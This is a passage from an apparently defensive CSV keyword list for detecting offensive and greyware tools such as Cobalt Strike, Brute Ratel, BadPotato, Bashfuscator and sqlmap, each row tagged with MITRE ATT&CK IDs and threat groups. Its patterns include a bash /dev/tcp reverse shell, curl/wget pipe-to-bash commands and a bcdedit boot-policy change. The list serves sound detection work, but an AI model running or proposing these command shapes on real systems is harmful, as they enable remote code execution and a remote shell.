T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Bad-Pdf*,offensive_tool_keyword,Bad-PDF,Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.,T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003,TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011,N/A,N/A,Credential Access,https://github.com/deepzec/Bad-Pdf,1,1,N/A,N/A,10,980,213,2020-08-19T06:54:51Z,2018-04-29T15:21:35Z -*BadPotato.cs*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BadPotato.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*badpotato.exe*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato,1,1,N/A,N/A,,N/A,,, -*badtouch*,offensive_tool_keyword,badtouch,Scriptable network authentication cracker,T1110 - T1210.001 - T1558.003,TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://github.com/kpcyrd/badtouch,1,0,N/A,N/A,4,363,44,2022-03-24T09:53:51Z,2018-03-15T22:27:56Z -*BadUSB_AddAdmin.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BadUSB_DownloadExecute.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BadUSB_FacebookPost.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BadUSB_HideWindow.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BadUSB_LockYourComputer.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BadZure-main*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,1,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*bananaKitten.exe*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*BaRMIe*,offensive_tool_keyword,BaRMIe,BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.,T1522 - T1070 - T1573 - T1071,TA0001 - TA0003 - TA0008 - TA0011,N/A,N/A,Information Gathering,https://github.com/NickstaDB/BaRMIe,1,0,N/A,N/A,7,691,107,2017-09-28T22:38:02Z,2017-09-24T18:54:12Z -*baron-samedit-heap-based-overflow-sudo.txt*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*base64_conversion_commands.ps1*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*base64_conversion_commands.ps1*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*bash -c *curl *.sh | bash*,greyware_tool_keyword,bash,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*bash -c *wget *.sh | bash*,greyware_tool_keyword,bash,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*bash -i >& /dev/tcp/*/* 0>&1*,greyware_tool_keyword,bash,bash reverse shell ,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*bash -i >& /dev/tcp/*/* 0>&1*,greyware_tool_keyword,bash,bash reverse shell,T1071 - T1071.004 - T1021,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*bash lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*bash_executor *,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,0,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*bash_read_line_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*bashfuscator -*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,0,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*Bashfuscator Team*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,0,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*bashfuscator.py*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,1,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*Bashfuscator-master*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,1,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -*BasicServiceExploit.class*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*BastilleResearch*,offensive_tool_keyword,Github Username,Open source testing tools for the SDR & security community,T1179 - T1141 - T1142 - T1143,TA0011 - ,N/A,N/A,Exploitation tools,https://github.com/BastilleResearch,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--batch --dump -T *,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*Bates.exe --kill*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*Bates.exe --listen*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*bats3c/ADCSPwn*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*bats3c/darkarmour*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*bats3c/DarkLoadLibrary*,offensive_tool_keyword,DarkLoadLibrary,LoadLibrary for offensive operations,T1071.001 - T1055.002 - T1055.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/DarkLoadLibrary,1,1,N/A,10,9,874,184,2021-10-22T07:27:58Z,2021-06-17T08:33:47Z -*bats3c/EvtMute*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*bawait_upload*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*bawait_upload_raw*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*bb3b1a1f-0447-42a6-955a-88681fb88499*,offensive_tool_keyword,Jatayu,Stealthy Stand Alone PHP Web Shell,T1071,TA0005,N/A,N/A,Shell spawning,https://github.com/SpiderMate/Jatayu,1,1,N/A,N/A,1,31,8,2019-09-12T17:03:13Z,2019-09-12T09:04:10Z -*bbcd54496dca975abf6089526023446984238d464e2df7485230b76072ff2ea1*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*bbce2e4fa4cbb392974e7276108f1f9091f31e806a2c81964c996953e0770125*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*bblcccknbdbplgmdjnnikffefhdlobhp*,greyware_tool_keyword,FastStunnel VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bblockdlls*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bbrowserpivot*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bbrowserpivot*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bbypassuac*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bc3023b36063a7681db24681472b54fa11f0d4ec*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*bcc2_setenv*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*bcc2_spawn*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*bcdedit* /set {default} bootstatuspolicy ignoreallfailures*,greyware_tool_keyword,bcdedit,Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.,T1218.004 - T1562.001,TA0007 - TA0040,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A 